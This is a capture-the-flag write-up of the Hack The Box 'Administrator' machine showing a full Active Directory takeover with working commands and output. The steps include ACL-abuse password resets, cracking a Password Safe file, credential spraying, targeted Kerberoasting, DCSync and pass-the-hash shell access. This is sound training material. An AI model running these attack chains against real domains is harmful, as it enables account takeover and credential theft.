Administrator
AD box on HTB.
Enumeration:
Port Scanning:
As always we are going to start with nmap:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Administrator]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 10.129.122.91
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-17 04:58 +03
Nmap scan report for 10.129.122.91
Host is up, received echo-reply ttl 127 (0.27s latency).
Scanned at 2025-09-17 04:58:39 +03 for 192s
Not shown: 65509 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 127 Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-09-17 08:59:14Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
<snipped>
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
<snipped>
|_clock-skew: 7h00m04s
<snipped>This time we have port 21 (FTP) open, and nmap could not authenticate as anonymous, because I did not see that in the result, which means we have to find valid username and password.
We will see the clock skew is too great, so I will sync the time with the target machine with nptdate for any further kerberos usage:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Administrator]
└─$ sudo ntpdate 10.129.122.91
2025-09-17 12:03:27.177419 (+0300) +25204.812522 +/- 0.086912 10.129.122.91 s1 no-leap
CLOCK: time stepped by 25204.812522Also lets get the domain name and the target machine name, and add it to the hosts file:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Administrator]
└─$ netexec smb 10.129.122.91
SMB 10.129.122.91 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Administrator]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
<snipped>
10.129.122.91 DC.administrator.htb administrator.htb DCWe are provided with a username and password to emulate assumed breach scenrios in real world engagements: olivia:ichliebedich.
BloodHound:
As we have domain user, we can start by ingesting the data, and upload it to BloodHound, and I will ingest using both bloodhound-python, and rusthound-ce, because if one misses something the other completes it:
┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Administrator/bloodhound]
└─$ bloodhound-python -u olivia -p 'ichliebedich' -ns 10.129.122.91 -d administrator.htb -dc dc.administrator.htb -c all
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: administrator.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: dc.administrator.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers INFO: Connecting to LDAP server: dc.administrator.htb
INFO: Found 11 users INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc.administrator.htb
INFO: Done in 00M 38S
┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Administrator/bloodhound] 05:06:39 [64/86]
└─$ rusthound-ce -u olivia -p ichliebedich -d administrator.htb -f dc.administrator.htb -i 10.129.122.91 -n 10.129.122.91
---------------------------------------------------
Initializing RustHound-CE at 05:06:21 on 09/17/25
Powered by @g0h4n_0
---------------------------------------------------
[2025-09-17T02:06:21Z INFO rusthound_ce] Verbosity level: Info
[2025-09-17T02:06:21Z INFO rusthound_ce] Collection method: All
[2025-09-17T02:06:22Z INFO rusthound_ce::ldap] Connected to ADMINISTRATOR.HTB Active Directory!
[2025-09-17T02:06:22Z INFO rusthound_ce::ldap] Starting data collection...
[2025-09-17T02:06:22Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-09-17T02:06:24Z INFO rusthound_ce::ldap] All data collected for NamingContext DC=administrator,DC=htb
[2025-09-17T02:06:24Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-09-17T02:06:33Z INFO rusthound_ce::ldap] All data collected for NamingContext CN=Configuration,DC=administrator,DC=htb [2025-09-17T02:06:33Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-09-17T02:06:38Z INFO rusthound_ce::ldap] All data collected for NamingContext CN=Schema,CN=Configuration,DC=administrator,DC=htb
[2025-09-17T02:06:38Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-09-17T02:06:39Z INFO rusthound_ce::ldap] All data collected for NamingContext DC=DomainDnsZones,DC=administrator,DC=htb
[2025-09-17T02:06:39Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-09-17T02:06:39Z INFO rusthound_ce::ldap] All data collected for NamingContext DC=ForestDnsZones,DC=administrator,DC=htb
[2025-09-17T02:06:39Z INFO rusthound_ce::api] Starting the LDAP objects parsing...
[2025-09-17T02:06:39Z INFO rusthound_ce::objects::domain] MachineAccountQuota: 10
[2025-09-17T02:06:39Z INFO rusthound_ce::api] Parsing LDAP objects finished!
[2025-09-17T02:06:39Z INFO rusthound_ce::json::checker] Starting checker to replace some values...
[2025-09-17T02:06:39Z INFO rusthound_ce::json::checker] Checking and replacing some values finished!
[2025-09-17T02:06:39Z INFO rusthound_ce::json::maker::common] 11 users parsed!
[2025-09-17T02:06:39Z INFO rusthound_ce::json::maker::common] .//20250917050639_administrator-htb_users.json created!
[2025-09-17T02:06:39Z INFO rusthound_ce::json::maker::common] 61 groups parsed!
[2025-09-17T02:06:39Z INFO rusthound_ce::json::maker::common] .//20250917050639_administrator-htb_groups.json created!
[2025-09-17T02:06:39Z INFO rusthound_ce::json::maker::common] 1 computers parsed!
[2025-09-17T02:06:39Z INFO rusthound_ce::json::maker::common] .//20250917050639_administrator-htb_computers.json created!
[2025-09-17T02:06:39Z INFO rusthound_ce::json::maker::common] 1 ous parsed!
[2025-09-17T02:06:39Z INFO rusthound_ce::json::maker::common] .//20250917050639_administrator-htb_ous.json created!
[2025-09-17T02:06:39Z INFO rusthound_ce::json::maker::common] 3 domains parsed!
[2025-09-17T02:06:39Z INFO rusthound_ce::json::maker::common] .//20250917050639_administrator-htb_domains.json created!
[2025-09-17T02:06:39Z INFO rusthound_ce::json::maker::common] 2 gpos parsed!
[2025-09-17T02:06:39Z INFO rusthound_ce::json::maker::common] .//20250917050639_administrator-htb_gpos.json created!
[2025-09-17T02:06:39Z INFO rusthound_ce::json::maker::common] 73 containers parsed!
[2025-09-17T02:06:39Z INFO rusthound_ce::json::maker::common] .//20250917050639_administrator-htb_containers.json created!
RustHound-CE Enumeration Completed at 05:06:39 on 09/17/25! Happy Graphing!Start BloodHound, and upload the ingested data to it:
┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Administrator/bloodhound] 05:07:19 [20/86]
└─$ sudo bloodhound
[sudo] password for kali:
Starting neo4j
Neo4j is not running.
<snipped>
......................................................
Bloodhound will start
IMPORTANT: It will take time, please wait...
<snipped>
opening http://127.0.0.1:8080Lateral Movememnt:
Mark olivia as owned, and check its outbound object control:
We have GenericAll ACL over michael user, which allows us to do various attacks, such as targetedkerberoast to add an SPN to the target user, and ask for his TGS, and then remove it, or we can perform shadow credentials to dump this user's ntlm hash, or simply what we can do is change this user's password.
I will use bloodyAD to do so:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Administrator]
└─$ bloodyAD --host 10.129.122.91 -d administrator.htb -u olivia -p 'ichliebedich' set password 'michael' 'Caesar3#'
[+] Password changed successfully!Confirm the password has been changed successfully:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Administrator]
└─$ netexec smb 10.129.122.91 -u michael -p 'Caesar3#'
SMB 10.129.122.91 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB 10.129.122.91 445 DC [+] administrator.htb\michael:Caesar3#Move on to michael, and see his outband object control:
So we can change benjamin's password as well.
I will use the same approach:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Administrator]
└─$ bloodyAD --host 10.129.122.91 -d administrator.htb -u michael -p 'Caesar3#' set password 'benjamin' 'Caesar3#'
[+] Password changed successfully!
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Administrator]
└─$ netexec smb 10.129.122.91 -u benjamin -p 'Caesar3#'
SMB 10.129.122.91 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB 10.129.122.91 445 DC [+] administrator.htb\benjamin:Caesar3#See this user's groups:
We are part of the share moderators, maybe we can do something with ftp since we are part of this group.
FTP Enumeration:
Try to access ftp with those credentials:
┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Administrator/ftp]
└─$ ftp benjamin@10.129.122.91
Connected to 10.129.122.91.
220 Microsoft FTP Service
331 Password required
Password: Caesar3#
230 User logged in.
Remote system type is Windows_NT.
ftp>We successfully managed to authenticate as we could not previously do.
Lets enumerate what files or folders there are:
ftp> ls
229 Entering Extended Passive Mode (|||60739|)
125 Data connection already open; Transfer starting.
10-05-24 09:13AM 952 Backup.psafe3
226 Transfer complete.
ftp> get Backup.psafe3
local: Backup.psafe3 remote: Backup.psafe3
229 Entering Extended Passive Mode (|||60741|)
125 Data connection already open; Transfer starting.
100% |*******************************************************************************************************************************| 952 3.79 KiB/s 00:00 ETA
226 Transfer complete.
WARNING! 3 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
952 bytes received in 00:00 (2.51 KiB/s)
ftp> exit
221 Goodbye.We will find Backup.psafe3 file, and I downloaded it with the ftp get built-in command.
This file is new to us, so we can do some searching to find what is it, and how we can interact or open it:
┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Administrator/ftp]
└─$ file Backup.psafe3
Backup.psafe3: Password Safe V3 databaseIt is a database.
I searched a little bit and found this htlm web page that tells us about a tool called pwsafe:
And I have it installed on my kali VM.
Lets open that backup file:
┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Administrator/ftp]
└─$ pwsafe Backup.psafe3
I tried multiple default passwords to access the database but could not, so we have to find a way to retrieve the master password.
Search a bit:
We will find that we have hashcat mode that can get the password, or with john using one of its tools pwsafe2john:
┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Administrator/ftp]
└─$ pwsafe2john Backup.psafe3
Backu:$pwsafe$*3*4ff588b74906263ad2abba592aba35d58bcd3a57e307bf79c8479dec6b3149aa*2048*1a941c10167252410ae04b7b43753aaedb4ec63e3f18c646bb084ec4f0944050Now attempt to crack it:
┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Administrator/ftp]
└─$ john Backup.psafe3.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (pwsafe, Password Safe [SHA256 256/256 AVX2 8x])
Cost 1 (iteration count) is 2048 for all loaded hashes
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
tekieromucho (Backu)
1g 0:00:00:00 DONE (2025-09-17 05:13) 5.263g/s 32336p/s 32336c/s 32336C/s 123456..iheartyou
Use the "--show" option to display all of the cracked passwords reliably
Session completed.Here is the password.
Lateral Movement again to emily:
Lets open that database again by specifying that password as the master password:
We can copy the usernames and the passwords, and save them into a file to spray them:
Using netexec:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Administrator]
└─$ netexec smb 10.129.122.91 -u users.txt -p passwords.txt --continue-on-success
SMB 10.129.122.91 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB 10.129.122.91 445 DC [-] administrator.htb\alexander:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw STATUS_LOGON_FAILURE
SMB 10.129.122.91 445 DC [-] administrator.htb\olivia:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw STATUS_LOGON_FAILURE
SMB 10.129.122.91 445 DC [-] administrator.htb\michael:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw STATUS_LOGON_FAILURE
SMB 10.129.122.91 445 DC [-] administrator.htb\benjamin:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw STATUS_LOGON_FAILURE
SMB 10.129.122.91 445 DC [-] administrator.htb\emily:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw STATUS_LOGON_FAILURE
SMB 10.129.122.91 445 DC [-] administrator.htb\emma:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw STATUS_LOGON_FAILURE
SMB 10.129.122.91 445 DC [-] administrator.htb\administrator:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw STATUS_LOGON_FAILURE
SMB 10.129.122.91 445 DC [-] administrator.htb\ethan:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw STATUS_LOGON_FAILURE
SMB 10.129.122.91 445 DC [-] administrator.htb\alexander:UXLCI5iETUsIBoFVTj8yQFKoHjXmb STATUS_LOGON_FAILURE
SMB 10.129.122.91 445 DC [-] administrator.htb\olivia:UXLCI5iETUsIBoFVTj8yQFKoHjXmb STATUS_LOGON_FAILURE
SMB 10.129.122.91 445 DC [-] administrator.htb\michael:UXLCI5iETUsIBoFVTj8yQFKoHjXmb STATUS_LOGON_FAILURE
SMB 10.129.122.91 445 DC [-] administrator.htb\benjamin:UXLCI5iETUsIBoFVTj8yQFKoHjXmb STATUS_LOGON_FAILURE
SMB 10.129.122.91 445 DC [+] administrator.htb\emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb
SMB 10.129.122.91 445 DC [-] administrator.htb\emma:UXLCI5iETUsIBoFVTj8yQFKoHjXmb STATUS_LOGON_FAILURE
SMB 10.129.122.91 445 DC [-] administrator.htb\administrator:UXLCI5iETUsIBoFVTj8yQFKoHjXmb STATUS_LOGON_FAILURE
SMB 10.129.122.91 445 DC [-] administrator.htb\ethan:UXLCI5iETUsIBoFVTj8yQFKoHjXmb STATUS_LOGON_FAILURE
SMB 10.129.122.91 445 DC [-] administrator.htb\alexander:WwANQWnmJnGV07WQN8bMS7FMAbjNur STATUS_LOGON_FAILURE
SMB 10.129.122.91 445 DC [-] administrator.htb\olivia:WwANQWnmJnGV07WQN8bMS7FMAbjNur STATUS_LOGON_FAILURE
SMB 10.129.122.91 445 DC [-] administrator.htb\michael:WwANQWnmJnGV07WQN8bMS7FMAbjNur STATUS_LOGON_FAILURE
SMB 10.129.122.91 445 DC [-] administrator.htb\benjamin:WwANQWnmJnGV07WQN8bMS7FMAbjNur STATUS_LOGON_FAILURE
SMB 10.129.122.91 445 DC [-] administrator.htb\emma:WwANQWnmJnGV07WQN8bMS7FMAbjNur STATUS_LOGON_FAILURE
SMB 10.129.122.91 445 DC [-] administrator.htb\administrator:WwANQWnmJnGV07WQN8bMS7FMAbjNur STATUS_LOGON_FAILURE
SMB 10.129.122.91 445 DC [-] administrator.htb\ethan:WwANQWnmJnGV07WQN8bMS7FMAbjNur STATUS_LOGON_FAILUREWe find that only emily's password worked for emily's herself.
Check BloodHound again:
We have GenericWrite over ethan.
Domain Privilege Escalation:
This time I will perform targetedkerberoast attack using a tool called targetedkerberoast to set an SPN for ethan, and ask for his TGS, and then remove that SPN:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Administrator]
└─$ python3 /opt/Tools/targetedKerberoast/targetedKerberoast.py -v -d administrator.htb -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb --request-user ethan
[*] Starting kerberoast attacks
[*] Attacking user (ethan)
[VERBOSE] SPN added successfully for (ethan)
[+] Printing hash for (ethan)
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$eec5d398cff7866a2e0b7541235bc728$e4e94cee759423a239a9e71309c9350b535d993694bc6ef62c7631bcf3d5bb40bf578f6bc7e41
77e5f23b40c5733d8edeefc3c3e94046516ca68c9b55520907603157b699c547f8f9083a5159142508b568451dd050f83b1eb85c8619bd23fd9e8674c21cb8ef9096fbeabcabac9a6f2759a7fb313041de0e253233ed
5831b179f6b1731f6d59560f9cd304ee720eab0a1bb23e92cfe0bb5d1bb8439512292ce7c80c1472cc4d75f31ec87084065f92437520873e4e4a1c7041c8fe6830b57d46451f190b141c3c0182dafb876918f654349f
b7ab1bfc5c633998c329fa267f59ab0ddbac5fbc7ca419df666db3d6be084bf238ca27168818b86de2d85bbfcbccd978c8b07f67e983c2c9931399637f59a64ce8250a3d12aa056e5146f6e54c96f2fa896e4f04a0c4
d923ec691574f4c26fac9dff3eb3a18518514a92c54d758a22ccc1eb52c064bc86b6240fd85e4a7dbd6e8b6eda7f11591c63063509efadec145e1acb84c6cf6cdbad21f2633105756a30e11c9993aee069b1fd4425d4
6b86f84ecd5e29c90f4ddbaa8f67d546e0761a2ef5b924d816a25b6b7afc2262aa0982abae273853a1144dfb9a71ac55da2402062f3b873475dc095fe2e59058949f9c705772d532745714db41095ffa180ecb8afd3e
1825b0d97f3967728e200bfc9f74ca4fa87386840e2bc4166bc2fec0a6965863d68ee334a264a8ea802c46726f9066c6fca13e71e111b18962c8e5736f584cc8fe51bff3ab79781f93604169677121427d69780a9d54
a33ba512edc170fd43bfbef9e2377fedc9b623dc98c3af37d419aed028fa7dc7c5b38fb89e667a503606ba627a02886434562304b2a73034dd0265f2efdc1798909d06d3774172ebc70221cfaffe89020d0dcf060f62
45c61c5d160f6fd546e91373fb38b8873d5430a1fbfdc21cd03e15e8ab445dc88caf8111d09c9e66c5dcd6ccb00f43bdf90e8a428444979988b1cc92a7a874b82aaf848552969d9beae8c8d3bfe0c21c505578c0aac2
e725fb9fbd45dbc46f960d4e69407903dcc49da09c96c23d7a4e2c44f8cfb2107163007c72bdd2856aa7b66d1cbb69dcbbd0babf4231b5b514f43794d5089462fe8fa601d2f8f7855e472fa104e10cde50b2ecebedfd
cdeb3867b3ba7f75f0b4e054ec20d11f84b822be70c67c58fb68f3e762e6826cbf9eda460940d3f37b9ac0e01f82d8f7d4fabe6c34f4e6b63146c02b25a108fd6dbf2f3f70c096dd359b4022d2d258ad589de144e0e6
de7014dcdc41cf756b5196d5f4ac093d6238eafa227d4a8912b91ad030eae94b6fe95d5b412e9ba2399347aec6d644a642e90970a41a99dd61f4d2c8e7a018b90bc3944033ceb37796425a01e1a9a65fc41d5e68315a
bdcecdf39e6efdc0181c3fc1c74e0f06fdf7f4f692dacdf9572fb38f4bff1719bcc12fce1f8a8fe8aad8ca1a4a28e72028155c98aa52a04b5fec64b26e3b80cc80cdda19d416f923ea3c90b4deafe3a14734b65ed6cb
3223d079729006892b2b80f460fc64150
[VERBOSE] SPN removed successfully for (ethan)Attempt to crack his hash with hashcat:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Administrator]
└─$ hashcat ethan.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting in autodetect mode
<snipped>
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$eec5d398cff7866a2e0b7541235bc728$e4e94cee759423a239a9e71309c9350b535d993694bc6ef62c7631bcf3d5bb40bf578f6bc7e41
77e5f23b40c5733d8edeefc3c3e94046516ca68c9b55520907603157b699c547f8f9083a5159142508b568451dd050f83b1eb85c8619bd23fd9e8674c21cb8ef9096fbeabcabac9a6f2759a7fb313041de0e253233ed
5831b179f6b1731f6d59560f9cd304ee720eab0a1bb23e92cfe0bb5d1bb8439512292ce7c80c1472cc4d75f31ec87084065f92437520873e4e4a1c7041c8fe6830b57d46451f190b141c3c0182dafb876918f654349f
b7ab1bfc5c633998c329fa267f59ab0ddbac5fbc7ca419df666db3d6be084bf238ca27168818b86de2d85bbfcbccd978c8b07f67e983c2c9931399637f59a64ce8250a3d12aa056e5146f6e54c96f2fa896e4f04a0c4
d923ec691574f4c26fac9dff3eb3a18518514a92c54d758a22ccc1eb52c064bc86b6240fd85e4a7dbd6e8b6eda7f11591c63063509efadec145e1acb84c6cf6cdbad21f2633105756a30e11c9993aee069b1fd4425d4
6b86f84ecd5e29c90f4ddbaa8f67d546e0761a2ef5b924d816a25b6b7afc2262aa0982abae273853a1144dfb9a71ac55da2402062f3b873475dc095fe2e59058949f9c705772d532745714db41095ffa180ecb8afd3e
1825b0d97f3967728e200bfc9f74ca4fa87386840e2bc4166bc2fec0a6965863d68ee334a264a8ea802c46726f9066c6fca13e71e111b18962c8e5736f584cc8fe51bff3ab79781f93604169677121427d69780a9d54
a33ba512edc170fd43bfbef9e2377fedc9b623dc98c3af37d419aed028fa7dc7c5b38fb89e667a503606ba627a02886434562304b2a73034dd0265f2efdc1798909d06d3774172ebc70221cfaffe89020d0dcf060f62
45c61c5d160f6fd546e91373fb38b8873d5430a1fbfdc21cd03e15e8ab445dc88caf8111d09c9e66c5dcd6ccb00f43bdf90e8a428444979988b1cc92a7a874b82aaf848552969d9beae8c8d3bfe0c21c505578c0aac2
e725fb9fbd45dbc46f960d4e69407903dcc49da09c96c23d7a4e2c44f8cfb2107163007c72bdd2856aa7b66d1cbb69dcbbd0babf4231b5b514f43794d5089462fe8fa601d2f8f7855e472fa104e10cde50b2ecebedfd
cdeb3867b3ba7f75f0b4e054ec20d11f84b822be70c67c58fb68f3e762e6826cbf9eda460940d3f37b9ac0e01f82d8f7d4fabe6c34f4e6b63146c02b25a108fd6dbf2f3f70c096dd359b4022d2d258ad589de144e0e6
de7014dcdc41cf756b5196d5f4ac093d6238eafa227d4a8912b91ad030eae94b6fe95d5b412e9ba2399347aec6d644a642e90970a41a99dd61f4d2c8e7a018b90bc3944033ceb37796425a01e1a9a65fc41d5e68315a
bdcecdf39e6efdc0181c3fc1c74e0f06fdf7f4f692dacdf9572fb38f4bff1719bcc12fce1f8a8fe8aad8ca1a4a28e72028155c98aa52a04b5fec64b26e3b80cc80cdda19d416f923ea3c90b4deafe3a14734b65ed6cb
3223d079729006892b2b80f460fc64150:limpbizkit
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator....c64150
Time.Started.....: Wed Sep 17 05:19:39 2025 (0 secs)
Time.Estimated...: Wed Sep 17 05:19:39 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 716.5 kH/s (1.21ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 6144/14344385 (0.04%)
Rejected.........: 0/6144 (0.00%)
Restore.Point....: 3072/14344385 (0.02%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: adriano -> iheartyou
Hardware.Mon.#1..: Util: 14%
<snipped>And finally, check ethan's ACLs over other objects:
So ehtan's has replication rights over the domain, so we can perform DCSync on the domain, I will use impacket-secretsdump to do that:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Administrator]
└─$ impacket-secretsdump administrator.htb/ethan:limpbizkit@10.129.122.91
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::
<snipped>
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:9d453509ca9b7bec02ea8c2161d2d340fd94bf30cc7e52cb94853a04e9e69664
Administrator:aes128-cts-hmac-sha1-96:08b0633a8dd5f1d6cbea29014caea5a2
Administrator:des-cbc-md5:403286f7cdf18385
<snipped>
[*] Cleaning up...Lets authenticate with the domain administrator ntlm hash:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Administrator]
└─$ evil-winrm -i 10.129.122.91 -u administrator -H 3dc553ce4b9fd20bd016e098d2d2fd2e
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
administrator\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> hostname
dc
*Evil-WinRM* PS C:\Users\Administrator\Documents> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : .htb
IPv4 Address. . . . . . . . . . . : 10.129.122.91
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : 10.129.0.1Get the flags:
*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\Administrator\Desktop\root.txt
060967316fa6601108f77a70fed17970
*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\emily\Desktop\user.txt
606f19540bf4f9b1365f182dd36185cb
*Evil-WinRM* PS C:\Users\Administrator\Documents>Last updated